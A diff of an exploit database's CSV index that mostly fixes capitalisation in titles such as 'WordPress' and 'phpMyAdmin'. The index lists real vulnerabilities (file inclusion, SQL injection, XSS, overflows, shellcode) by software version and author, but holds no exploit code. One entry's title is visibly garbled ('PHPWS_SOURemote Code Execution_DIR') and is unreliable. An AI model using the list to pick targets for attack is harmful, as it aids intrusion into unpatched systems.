28774,platforms/php/webapps/28774.txt,"phpWebSite 0.10.2 - PHPWS_SOURemote Code Execution_DIR Parameter Multiple Remote File Inclusion",2006-10-09,Crackers_Child,php,webapps,0 28775,platforms/linux/dos/28775.pl,"ZABBIX 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities",2006-10-09,"Max Vozeler",linux,dos,0 28776,platforms/php/webapps/28776.txt,"EXPBlog 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-10-09,Tamriel,php,webapps,0 28777,platforms/php/webapps/28777.txt,"Hastymail 1.x - IMAP SMTP Command Injection",2006-10-10,"Vicente Aguilera Diaz",php,webapps,0 -28778,platforms/php/webapps/28778.txt,"ironwebmail 6.1.1 - Directory Traversal information disclosure",2006-10-16,"Derek Callaway",php,webapps,0 +28778,platforms/php/webapps/28778.txt,"ironwebmail 6.1.1 - Directory Traversal Information Disclosure",2006-10-16,"Derek Callaway",php,webapps,0 28779,platforms/php/webapps/28779.txt,"Album Photo Sans Nom 1.6 - Getimg.php Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 28780,platforms/php/webapps/28780.txt,"Softerra PHP Developer Library 1.5.3 - Grid3.lib.php Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 28781,platforms/php/webapps/28781.txt,"BlueShoes Framework 4.6 - GoogleSearch.php Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 @@ -25843,7 +25844,7 @@ id,file,description,date,author,platform,type,port 29213,platforms/windows/local/29213.pl,"Photodex ProShow Producer 5.0.3310 - Local Buffer Overflow (SEH)",2013-10-26,"Mike Czumak",windows,local,0 28806,platforms/linux/local/28806.txt,"davfs2 1.4.6/1.4.7 - Privilege Escalation",2013-10-08,"Lorenzo Cantoni",linux,local,0 28807,platforms/php/webapps/28807.py,"WHMCS 5.2.7 - SQL Injection",2013-10-08,localhost.re,php,webapps,0 -28808,platforms/php/webapps/28808.txt,"Wordpress Quick Contact Form Plugin 6.0 - Persistent Cross-Site Scripting",2013-10-08,Zy0d0x,php,webapps,0 +28808,platforms/php/webapps/28808.txt,"WordPress Quick Contact Form Plugin 6.0 - Persistent Cross-Site Scripting",2013-10-08,Zy0d0x,php,webapps,0 28809,platforms/windows/remote/28809.rb,"HP LoadRunner - magentproc.exe Overflow",2013-10-08,Metasploit,windows,remote,443 28810,platforms/unix/remote/28810.rb,"GestioIP - Remote Command Execution",2013-10-08,Metasploit,unix,remote,0 28811,platforms/osx/dos/28811.txt,"Apple Motion 5.0.7 - Integer Overflow",2013-10-08,"Jean Pascal Pereira",osx,dos,0 @@ -25910,8 +25911,8 @@ id,file,description,date,author,platform,type,port 28873,platforms/php/webapps/28873.txt,"Exhibit Engine 1.22 - fetchsettings.php toroot Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 28874,platforms/php/webapps/28874.txt,"Exhibit Engine 1.22 - fstyles.php toroot Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 28875,platforms/php/webapps/28875.txt,"Freenews 1.1 - Aff_News.php Remote File Inclusion",2006-10-30,MoHaNdKo,php,webapps,0 -28876,platforms/windows/remote/28876.htm,"Microsoft Internet Explorer 6.0 - Unspecified Code Execution (1)",2006-10-30,"Michal Bucko",windows,remote,0 -28877,platforms/windows/remote/28877.htm,"Microsoft Internet Explorer 6.0 - Unspecified Code Execution (2)",2006-10-30,"Michal Bucko",windows,remote,0 +28876,platforms/windows/remote/28876.htm,"Microsoft Internet Explorer 6 - Unspecified Code Execution (1)",2006-10-30,"Michal Bucko",windows,remote,0 +28877,platforms/windows/remote/28877.htm,"Microsoft Internet Explorer 6 - Unspecified Code Execution (2)",2006-10-30,"Michal Bucko",windows,remote,0 28878,platforms/asp/webapps/28878.txt,"Evandor Easy notesManager 0.0.1 - 'login.php' username Parameter SQL Injection",2006-10-30,poplix,asp,webapps,0 28879,platforms/asp/webapps/28879.txt,"Evandor Easy notesManager 0.0.1 - Search Page SQL Injection",2006-10-30,poplix,asp,webapps,0 28880,platforms/windows/dos/28880.txt,"Microsoft Internet Explorer 6.0/7.0 - RemoveChild Denial of Service",2006-10-30,"Wojciech H",windows,dos,0 @@ -25929,9 +25930,9 @@ id,file,description,date,author,platform,type,port 28892,platforms/php/webapps/28892.txt,"RSSonate - Project_Root Parameter Remote File Inclusion",2006-11-01,Arab4services,php,webapps,0 28893,platforms/php/webapps/28893.pl,"KnowledgeBuilder 2.2 - visEdit_Control.Class.php Remote File Inclusion",2006-11-08,igi,php,webapps,0 28894,platforms/windows/dos/28894.txt,"Outpost Firewall PRO 4.0 - Local Denial of Service",2006-11-01,"Matousec Transparent security",windows,dos,0 -28895,platforms/linux/dos/28895.txt,"Linux Kernel 2.6.x - SquashFS Double Free Denial of Service",2006-11-02,LMH,linux,dos,0 +28895,platforms/linux/dos/28895.txt,"Linux Kernel 2.6.x - SquashFS Double-Free Denial of Service",2006-11-02,LMH,linux,dos,0 28896,platforms/php/webapps/28896.txt,"RunCMS 1.x - Avatar Arbitrary File Upload",2006-11-02,securfrog,php,webapps,0 -28897,platforms/windows/dos/28897.txt,"Microsoft Internet Explorer 7.0 - MHTML Denial of Service",2006-11-02,"Positive Technologies",windows,dos,0 +28897,platforms/windows/dos/28897.txt,"Microsoft Internet Explorer 7 - MHTML Denial of Service",2006-11-02,"Positive Technologies",windows,dos,0 28898,platforms/php/webapps/28898.txt,"FreeWebShop 2.2 - 'index.php' SQL Injection",2006-11-02,Spiked,php,webapps,0 28899,platforms/php/webapps/28899.txt,"NewP News Publishing System 1.0 - Class.Database.php Remote File Inclusion",2006-11-07,navairum,php,webapps,0 28900,platforms/php/webapps/28900.txt,"ac4p Mobile - 'index.php' Multiple Parameter Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0 @@ -25942,7 +25943,7 @@ id,file,description,date,author,platform,type,port 28905,platforms/php/webapps/28905.txt,"ac4p Mobile - cp/index.php pagenav Parameter Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0 28906,platforms/php/webapps/28906.txt,"Simplog 0.9.3 BlogID Parameter - Multiple SQL Injections",2006-11-03,"Benjamin Moss",php,webapps,0 28907,platforms/php/webapps/28907.txt,"Simplog 0.9.3 - archive.php PID Parameter Cross-Site Scripting",2006-11-03,"Benjamin Moss",php,webapps,0 -28908,platforms/php/webapps/28908.txt,"Advanced GuestBook 2.3.1 - admin.php Remote File Inclusion",2006-11-03,BrokeN-ProXy,php,webapps,0 +28908,platforms/php/webapps/28908.txt,"Advanced Guestbook 2.3.1 - admin.php Remote File Inclusion",2006-11-03,BrokeN-ProXy,php,webapps,0 28909,platforms/php/webapps/28909.txt,"IF-CMS - 'index.php' Cross-Site Scripting",2006-11-04,"Benjamin Moss",php,webapps,0 28910,platforms/php/webapps/28910.pl,"PHPKit 1.6.1 - popup.php SQL Injection",2006-11-04,x23,php,webapps,0 28911,platforms/solaris/dos/28911.txt,"Sun Solaris 10 - UFS Local Denial of Service",2006-11-04,LMH,solaris,dos,0 @@ -25977,13 +25978,13 @@ id,file,description,date,author,platform,type,port 28939,platforms/php/webapps/28939.txt,"Kayako SupportSuite 3.0.32 - 'index.php' Cross-Site Scripting",2006-11-07,Dr.HAiL,php,webapps,0 28940,platforms/php/webapps/28940.txt,"PHPMyChat 0.14/0.15 - Languages.Lib.php Local File Inclusion",2006-11-08,ajann,php,webapps,0 28941,platforms/asp/webapps/28941.txt,"Immediacy .NET CMS 5.2 - Logon.aspx Cross-Site Scripting",2006-11-08,"Gemma Hughes",asp,webapps,0 -28942,platforms/php/webapps/28942.txt,"FreeWebshop 2.1/2.2 - 'index.php' page Parameter Traversal Arbitrary File Access",2006-11-08,"laurent gaffie",php,webapps,0 -28943,platforms/php/webapps/28943.txt,"FreeWebshop 2.1/2.2 - 'index.php' cat Parameter Cross-Site Scripting",2006-11-08,"laurent gaffie",php,webapps,0 +28942,platforms/php/webapps/28942.txt,"FreeWebShop 2.1/2.2 - 'index.php' page Parameter Traversal Arbitrary File Access",2006-11-08,"laurent gaffie",php,webapps,0 +28943,platforms/php/webapps/28943.txt,"FreeWebShop 2.1/2.2 - 'index.php' cat Parameter Cross-Site Scripting",2006-11-08,"laurent gaffie",php,webapps,0 28944,platforms/php/webapps/28944.txt,"Abarcar Realty Portal 5.1.5/6.0.1 - Multiple SQL Injections",2006-11-08,"Benjamin Moss",php,webapps,0 28945,platforms/php/webapps/28945.txt,"PHPMyChat Plus 1.9 - Multiple Local File Inclusion",2006-11-08,ajann,php,webapps,0 28946,platforms/php/webapps/28946.txt,"Portix-PHP 0.4.2 - Multiple SQL Injections",2006-11-08,"Benjamin Moss",php,webapps,0 28947,platforms/php/webapps/28947.txt,"Speedywiki 2.0/2.1 - Multiple Input Validation Vulnerabilities",2006-11-08,"laurent gaffie",php,webapps,0 -28948,platforms/osx/dos/28948.c,"Apple Mac OSX 10.x - FPathConf System Call Local Denial of Service",2006-11-09,"ilja van sprundel",osx,dos,0 +28948,platforms/osx/dos/28948.c,"Apple Mac OS X 10.x - FPathConf System Call Local Denial of Service",2006-11-09,"ilja van sprundel",osx,dos,0 28949,platforms/php/webapps/28949.txt,"bitweaver 1.x - newsletters/edition.php tk Parameter SQL Injection",2006-11-09,"laurent gaffie",php,webapps,0 28950,platforms/php/webapps/28950.txt,"LandShop 0.6.3 - ls.php Multiple Parameter Cross-Site Scripting",2006-11-09,"laurent gaffie",php,webapps,0 28951,platforms/php/webapps/28951.txt,"LandShop 0.6.3 - ls.php Multiple Parameter SQL Injection",2006-11-09,"laurent gaffie",php,webapps,0 @@ -25993,19 +25994,19 @@ id,file,description,date,author,platform,type,port 28955,platforms/windows/local/28955.py,"Internet Haut Debit Mobile PCW_MATMARV1.0.0B03 - Buffer Overflow SEH",2013-10-14,metacom,windows,local,0 28956,platforms/php/webapps/28956.txt,"StatusNet/Laconica 0.7.4/0.8.2/0.9.0beta3 - Arbitrary File Reading",2013-10-14,spiderboy,php,webapps,80 28957,platforms/android/dos/28957.txt,"Android Zygote - Socket and Fork bomb Attack",2013-10-14,"Luca Verderame",android,dos,0 -28959,platforms/php/webapps/28959.txt,"Wordpress Cart66 Plugin 1.5.1.14 - Multiple Vulnerabilities",2013-10-14,absane,php,webapps,80 +28959,platforms/php/webapps/28959.txt,"WordPress Cart66 Plugin 1.5.1.14 - Multiple Vulnerabilities",2013-10-14,absane,php,webapps,80 28960,platforms/php/webapps/28960.py,"aMSN 0.98.9 Web App - Multiple Vulnerabilities",2013-10-14,drone,php,webapps,80 -29086,platforms/asp/webapps/29086.txt,"ActiveNews Manager - activenews_view.asp articleID Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 +29086,platforms/asp/webapps/29086.txt,"ActiveNews Manager - activenews_view.asp articleId Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 28962,platforms/multiple/remote/28962.rb,"VMware Hyperic HQ Groovy Script-Console - Java Execution",2013-10-14,Metasploit,multiple,remote,0 28963,platforms/php/webapps/28963.txt,"Bitweaver 1.x - fisheye/index.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28964,platforms/php/webapps/28964.txt,"Bitweaver 1.x - wiki/orphan_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28965,platforms/php/webapps/28965.txt,"Bitweaver 1.x - wiki/list_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28966,platforms/php/webapps/28966.txt,"Drake CMS 0.2 - 'index.php' Cross-Site Scripting",2006-11-10,CorryL,php,webapps,0 -28967,platforms/php/webapps/28967.txt,"ExoPHPdesk 1.2 - Pipe.php Remote File Inclusion",2006-11-11,Firewall1954,php,webapps,0 +28967,platforms/php/webapps/28967.txt,"ExoPHPDesk 1.2 - Pipe.php Remote File Inclusion",2006-11-11,Firewall1954,php,webapps,0 28968,platforms/windows/remote/28968.html,"Aladdin Knowledge Systems Ltd. PrivAgent - ActiveX Control Overflow",2013-10-15,blake,windows,remote,0 28969,platforms/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - SEH Buffer Overflow",2013-10-15,metacom,windows,local,0 -28970,platforms/php/webapps/28970.txt,"Dexs PM System Wordpress Plugin - Authenticated Persistent Cross-Site Scripting",2013-10-15,TheXero,php,webapps,80 -28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - (exportcsv.php sondage parameter) SQL Injection",2013-10-15,drone,php,webapps,80 +28970,platforms/php/webapps/28970.txt,"Dexs PM System WordPress Plugin - Authenticated Persistent Cross-Site Scripting",2013-10-15,TheXero,php,webapps,80 +28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - (exportcsv.php sondage Parameter) SQL Injection",2013-10-15,drone,php,webapps,80 28972,platforms/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection / Remote Code Execution (Metasploit)",2013-10-15,"Jason Kratzer",unix,webapps,0 28973,platforms/windows/remote/28973.rb,"HP Data Protector - Cell Request Service Buffer Overflow",2013-10-15,Metasploit,windows,remote,0 28974,platforms/windows/remote/28974.rb,"Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080)",2013-10-15,Metasploit,windows,remote,0 @@ -26014,8 +26015,8 @@ id,file,description,date,author,platform,type,port 28977,platforms/ios/webapps/28977.txt,"UbiDisk File Manager 2.0 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0 28978,platforms/ios/webapps/28978.txt,"Apple iOS 7.0.2 - Sim Lock Screen Display Bypass",2013-10-15,Vulnerability-Lab,ios,webapps,0 28979,platforms/linux/webapps/28979.txt,"DornCMS Application 1.4 - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,linux,webapps,0 -28980,platforms/php/webapps/28980.txt,"Wordpress 2.0.5 - functions.php Remote File Inclusion",2006-11-11,_ANtrAX_,php,webapps,0 -28981,platforms/multiple/remote/28981.txt,"IBM WebSphere 6.0 - Faultactor Cross-Site Scripting",2006-11-13,"Nuri Fattah",multiple,remote,0 +28980,platforms/php/webapps/28980.txt,"WordPress 2.0.5 - functions.php Remote File Inclusion",2006-11-11,_ANtrAX_,php,webapps,0 +28981,platforms/multiple/remote/28981.txt,"IBM Websphere 6.0 - Faultactor Cross-Site Scripting",2006-11-13,"Nuri Fattah",multiple,remote,0 28982,platforms/php/webapps/28982.txt,"cPanel 10 - seldir.html dir Parameter Cross-Site Scripting",2006-11-13,"Aria-Security Team",php,webapps,0 28983,platforms/php/webapps/28983.txt,"cPanel 10 - newuser.html Multiple Parameter Cross-Site Scripting",2006-11-13,"Aria-Security Team",php,webapps,0 28984,platforms/hp-ux/local/28984.pl,"HP Tru64 4.0/5.1 - POSIX Threads Library Privilege Escalation",2006-11-13,"Adriel T. Desautels",hp-ux,local,0 @@ -26027,13 +26028,13 @@ id,file,description,date,author,platform,type,port 28990,platforms/asp/webapps/28990.txt,"INFINICART - sendpassword.asp email Parameter Cross-Site Scripting",2006-11-13,"laurent gaffie",asp,webapps,0 28991,platforms/asp/webapps/28991.txt,"INFINICART - 'login.asp' Multiple Parameter Cross-Site Scripting",2006-11-13,"laurent gaffie",asp,webapps,0 28992,platforms/asp/webapps/28992.txt,"INFINICART - browse_group.asp groupid Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0 -28993,platforms/asp/webapps/28993.txt,"INFINICART - added_to_cart.asp productid Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0 +28993,platforms/asp/webapps/28993.txt,"INFINICART - added_to_cart.asp ProductID Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0 28994,platforms/asp/webapps/28994.txt,"INFINICART - browsesubcat.asp Multiple Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0 28995,platforms/php/webapps/28995.txt,"WebTester 5.x - Multiple Vulnerabilities",2013-10-16,X-Cisadane,php,webapps,80 28996,platforms/windows/shellcode/28996.c,"Windows - Messagebox Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",windows,shellcode,0 29151,platforms/asp/webapps/29151.txt,"Link Exchange Lite 1.0 - Multiple SQL Injections",2006-11-21,"laurent gaffie",asp,webapps,0 29152,platforms/asp/webapps/29152.txt,"JiRos Link Manager 1.0 - openlink.asp LinkID Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 -29153,platforms/asp/webapps/29153.txt,"JiRos Link Manager 1.0 - viewlinks.asp CategoryID Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 +29153,platforms/asp/webapps/29153.txt,"JiRos Link Manager 1.0 - viewlinks.asp categoryId Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 29154,platforms/asp/webapps/29154.txt,"CreaDirectory 1.2 - search.asp category Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 29155,platforms/asp/webapps/29155.txt,"CreaDirectory 1.2 - addlisting.asp cat Parameter Cross-Site Scripting",2006-11-21,"laurent gaffie",asp,webapps,0 28998,platforms/php/webapps/28998.txt,"PHPdebug 1.1 - Debug_test.php Remote File Inclusion",2006-11-12,Firewall,php,webapps,0 @@ -26047,7 +26048,7 @@ id,file,description,date,author,platform,type,port 29006,platforms/php/webapps/29006.txt,"DirectAdmin 1.28/1.29 - CMD_FTP_SHOW DOMAIN Parameter Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0 29007,platforms/osx/dos/29007.html,"Apple Safari 2.0.4 - JavaScript Regular Expression Match Remote Denial of Service",2006-11-14,jbh_cg,osx,dos,0 29008,platforms/asp/webapps/29008.txt,"FunkyASP Glossary 1.0 - Glossary.asp SQL Injection",2006-11-14,saps.audit,asp,webapps,0 -29009,platforms/asp/webapps/29009.txt,"SitesOutlet Ecommerce Kit - Multiple SQL Injections",2006-11-15,"laurent gaffie",asp,webapps,0 +29009,platforms/asp/webapps/29009.txt,"SitesOutlet eCommerce Kit - Multiple SQL Injections",2006-11-15,"laurent gaffie",asp,webapps,0 29010,platforms/asp/webapps/29010.txt,"SiteXpress E-Commerce System - Dept.asp SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps,0 29011,platforms/asp/webapps/29011.txt,"ASPIntranet 2.1 - default.asp SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps,0 29012,platforms/asp/webapps/29012.txt,"DMXReady Site Engine Manager 1.0 - index.asp SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps,0 @@ -26059,7 +26060,7 @@ id,file,description,date,author,platform,type,port 29018,platforms/php/webapps/29018.txt,"Plesk 7.5/8.0 - login_up.php3 Cross-Site Scripting",2006-11-14,"David Vieira-Kurz",php,webapps,0 29019,platforms/php/webapps/29019.txt,"Zikula CMS 1.3.5 - Multiple Vulnerabilities",2013-10-17,Vulnerability-Lab,php,webapps,0 29020,platforms/php/webapps/29020.txt,"Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting",2013-10-17,Zy0d0x,php,webapps,80 -29021,platforms/php/webapps/29021.txt,"Wordpress Plugin Realty - Blind SQL Injection",2013-10-17,Napsterakos,php,webapps,80 +29021,platforms/php/webapps/29021.txt,"WordPress Plugin Realty - Blind SQL Injection",2013-10-17,Napsterakos,php,webapps,80 29023,platforms/php/webapps/29023.txt,"Woltlab Burning Board Regenbogenwiese 2007 Addon - SQL Injection",2013-10-17,"Easy Laster",php,webapps,0 29024,platforms/asp/webapps/29024.txt,"Inventory Manager - Multiple Input Validation Vulnerabilities",2006-11-14,"laurent gaffie",asp,webapps,0 29025,platforms/asp/webapps/29025.txt,"Evolve Merchant - viewcart.asp SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 @@ -26082,7 +26083,7 @@ id,file,description,date,author,platform,type,port 29043,platforms/asp/webapps/29043.txt,"Dragon Internet Events Listing 2.0.01 - event_searchdetail.asp ID Parameter SQL Injection",2006-11-15,"Benjamin Moss",asp,webapps,0 29044,platforms/asp/webapps/29044.txt,"Dragon Internet Events Listing 2.0.01 - admin_login.asp Multiple Field SQL Injection",2006-11-15,"Benjamin Moss",asp,webapps,0 29045,platforms/windows/remote/29045.txt,"Selenium Web Server 1.0 - Cross-Site Scripting",2006-11-15,"Greg Linares",windows,remote,0 -29046,platforms/asp/webapps/29046.txt,"ASPIntranet 2.1 - Mutiple SQL Injection",2006-11-15,"Aria-Security Team",asp,webapps,0 +29046,platforms/asp/webapps/29046.txt,"ASPIntranet 2.1 - Multiple SQL Injection",2006-11-15,"Aria-Security Team",asp,webapps,0 29047,platforms/php/webapps/29047.txt,"Hot Links - Perl PHP Information Disclosure",2006-11-15,hack2prison,php,webapps,0 29048,platforms/asp/webapps/29048.txt,"i-Gallery 3.4 - igallery.asp Multiple Parameter Cross-Site Scripting",2006-11-16,"Aria-Security Team",asp,webapps,0 29049,platforms/php/webapps/29049.txt,"BlogTorrent Preview 0.92 - Announce.php Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0 @@ -26094,19 +26095,19 @@ id,file,description,date,author,platform,type,port 29055,platforms/php/webapps/29055.txt,"Eggblog 3.1 - admin/articles.php edit Parameter Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0 29056,platforms/php/webapps/29056.txt,"Eggblog 3.1 - admin/comments.php edit Parameter Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0 29057,platforms/php/webapps/29057.txt,"Eggblog 3.1 - admin/users.php add Parameter Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0 -29058,platforms/php/webapps/29058.txt,"PHPMyAdmin 2.x - db_create.php db Parameter Cross-Site Scripting",2006-09-15,"laurent gaffie",php,webapps,0 -29059,platforms/php/webapps/29059.txt,"PHPMyAdmin 2.x - db_operations.php Multiple Parameter Cross-Site Scripting",2006-09-15,"laurent gaffie",php,webapps,0 -29060,platforms/php/webapps/29060.txt,"PHPMyAdmin 2.x - querywindow.php Multiple Parameter Cross-Site Scripting",2006-09-15,"laurent gaffie",php,webapps,0 -29061,platforms/php/webapps/29061.txt,"PHPMyAdmin 2.x - sql.php pos Parameter Cross-Site Scripting",2006-09-15,"laurent gaffie",php,webapps,0 +29058,platforms/php/webapps/29058.txt,"phpMyAdmin 2.x - db_create.php db Parameter Cross-Site Scripting",2006-09-15,"laurent gaffie",php,webapps,0 +29059,platforms/php/webapps/29059.txt,"phpMyAdmin 2.x - db_operations.php Multiple Parameter Cross-Site Scripting",2006-09-15,"laurent gaffie",php,webapps,0 +29060,platforms/php/webapps/29060.txt,"phpMyAdmin 2.x - querywindow.php Multiple Parameter Cross-Site Scripting",2006-09-15,"laurent gaffie",php,webapps,0 +29061,platforms/php/webapps/29061.txt,"phpMyAdmin 2.x - sql.php pos Parameter Cross-Site Scripting",2006-09-15,"laurent gaffie",php,webapps,0 29062,platforms/php/webapps/29062.txt,"phpMyAdmin 2.x - Multiple Script Array Handling Full Path Disclosure",2006-09-15,"laurent gaffie",php,webapps,0 29063,platforms/asp/webapps/29063.txt,"Xtreme ASP Photo Gallery 2.0 - displaypic.asp sortorder Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 29064,platforms/asp/webapps/29064.txt,"Xtreme ASP Photo Gallery 2.0 - displaypic.asp catname Parameter Cross-Site Scripting",2006-11-16,"Aria-Security Team",asp,webapps,0 29065,platforms/php/webapps/29065.txt,"WHMCS 5.2.8 - SQL Injection",2013-10-19,g00n,php,webapps,0 -29150,platforms/php/webapps/29150.txt,"Wordpress SAICO Theme 1.0-1.0.2 - Arbitrary File Upload",2013-10-24,"Byakuya Kouta",php,webapps,0 -29148,platforms/windows/dos/29148.txt,"ASF Demux for VLC 2.0.x - Denial of Service (POC)",2013-10-23,"Pedro Ribeiro",windows,dos,0 +29150,platforms/php/webapps/29150.txt,"WordPress SAICO Theme 1.0-1.0.2 - Arbitrary File Upload",2013-10-24,"Byakuya Kouta",php,webapps,0 +29148,platforms/windows/dos/29148.txt,"ASF Demux for VLC 2.0.x - Denial of Service (PoC)",2013-10-23,"Pedro Ribeiro",windows,dos,0 29221,platforms/cgi/webapps/29221.txt,"BlueSocket BSC 2100 5.0/5.1 - Admin.pl Cross-Site Scripting",2006-12-04,"Jesus Olmos Gonzalez",cgi,webapps,0 29222,platforms/php/webapps/29222.txt,"Cerberus Helpdesk 2.x - Spellwin.php Cross-Site Scripting",2006-12-04,"En Douli",php,webapps,0 -29068,platforms/php/webapps/29068.txt,"Wordpress Area53 theme - Arbitrary File Upload",2013-10-19,"Byakuya Kouta",php,webapps,80 +29068,platforms/php/webapps/29068.txt,"WordPress Area53 theme - Arbitrary File Upload",2013-10-19,"Byakuya Kouta",php,webapps,80 29069,platforms/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver (kmxfw.sys) Privilege Escalation",2006-11-16,"Ruben Santamarta ",windows,local,0 29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver (kmxstart.sys) Privilege Escalation",2006-11-16,"Ruben Santamarta ",windows,local,0 29071,platforms/php/webapps/29071.txt,"CPanel 10 - DNSlook.HTML Cross-Site Scripting",2006-11-17,"Aria-Security Team",php,webapps,0 @@ -26121,15 +26122,15 @@ id,file,description,date,author,platform,type,port 29080,platforms/asp/webapps/29080.txt,"BestWebApp Dating Site Login Component - Multiple Field SQL Injection",2006-11-17,"laurent gaffie",asp,webapps,0 29081,platforms/asp/webapps/29081.txt,"BestWebApp Dating Site - login_form.asp msg Parameter Cross-Site Scripting",2006-11-17,"laurent gaffie",asp,webapps,0 29085,platforms/asp/webapps/29085.txt,"A-CART 2.0 - category.asp catcode Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 -29084,platforms/asp/webapps/29084.txt,"A-Cart Pro 2.0 - product.asp productid Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 +29084,platforms/asp/webapps/29084.txt,"A-Cart Pro 2.0 - product.asp ProductID Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 29083,platforms/windows/remote/29083.txt,"Sage 1.3.x - IMG Element Input Validation",2006-09-08,"Kevin Kierznowski",windows,remote,0 29087,platforms/asp/webapps/29087.txt,"ActiveNews Manager - default.asp page Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 29088,platforms/asp/webapps/29088.txt,"ActiveNews Manager - activenews_search.asp query Parameter Cross-Site Scripting",2006-11-18,"laurent gaffie",asp,webapps,0 29089,platforms/asp/webapps/29089.txt,"Active News Manager - activeNews_categories.asp catID Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 -29090,platforms/asp/webapps/29090.txt,"Active News Manager - activeNews_comments.asp articleID Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 +29090,platforms/asp/webapps/29090.txt,"Active News Manager - activeNews_comments.asp articleId Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 29091,platforms/php/webapps/29091.txt,"ZonPHP 2.25 - Remote Code Execution (Remote Code Execution)",2013-10-20,"Halim Cruzito",php,webapps,0 29156,platforms/asp/webapps/29156.txt,"CreaDirectory 1.2 - search.asp search Parameter Cross-Site Scripting",2006-11-21,"laurent gaffie",asp,webapps,0 -29211,platforms/php/webapps/29211.txt,"Wordpress Curvo Themes - Cross-Site Request Forgery File Upload",2013-10-26,"Byakuya Kouta",php,webapps,0 +29211,platforms/php/webapps/29211.txt,"WordPress Curvo Themes - Cross-Site Request Forgery File Upload",2013-10-26,"Byakuya Kouta",php,webapps,0 29118,platforms/asp/webapps/29118.txt,"Enthrallweb eClassifieds - ad.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29093,platforms/asp/webapps/29093.txt,"Texas Rankem - player.asp selPlayer Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 29094,platforms/asp/webapps/29094.txt,"Texas Rankem - tournaments.asp tournament_id Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 @@ -26178,15 +26179,15 @@ id,file,description,date,author,platform,type,port 29157,platforms/php/webapps/29157.txt,"Seditio 1.10 - Users.Profile.Inc.php SQL Injection",2006-11-21,"Mustafa Can Bjorn",php,webapps,0 29158,platforms/php/webapps/29158.txt,"CuteNews 1.4.5 - show_news.php Query String Cross-Site Scripting",2006-11-21,"Alireza Hassani",php,webapps,0 29159,platforms/php/webapps/29159.txt,"CuteNews 1.4.5 - rss.php rss_title Parameter Cross-Site Scripting",2006-11-21,"Alireza Hassani",php,webapps,0 -29160,platforms/linux/remote/29160.c,"GNU Tar 1.1x - GNUTYPE_NAMES Remote Directory Traversal",2006-11-21,"Teemu Salmela",linux,remote,0 +29160,platforms/linux/remote/29160.c,"GNU Tar 1.1x - GNUTYPE_NAMES Directory Traversal",2006-11-21,"Teemu Salmela",linux,remote,0 29141,platforms/asp/webapps/29141.txt,"The Classified Ad System 3.0 - default.asp Multiple Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 29142,platforms/asp/webapps/29142.txt,"Klf-Realty 2.0 - search_listing.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29143,platforms/asp/webapps/29143.txt,"Klf-Realty 2.0 - detail.asp property_id Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29144,platforms/osx/dos/29144.txt,"Apple Mac OSX 10.4.8 - UDIF Disk Image Remote Denial of Service",2006-11-20,LMH,osx,dos,0 +29144,platforms/osx/dos/29144.txt,"Apple Mac OS X 10.4.8 - UDIF Disk Image Remote Denial of Service",2006-11-20,LMH,osx,dos,0 29145,platforms/php/webapps/29145.txt,"Wabbit PHP Gallery 0.9 - Dir Parameter Directory 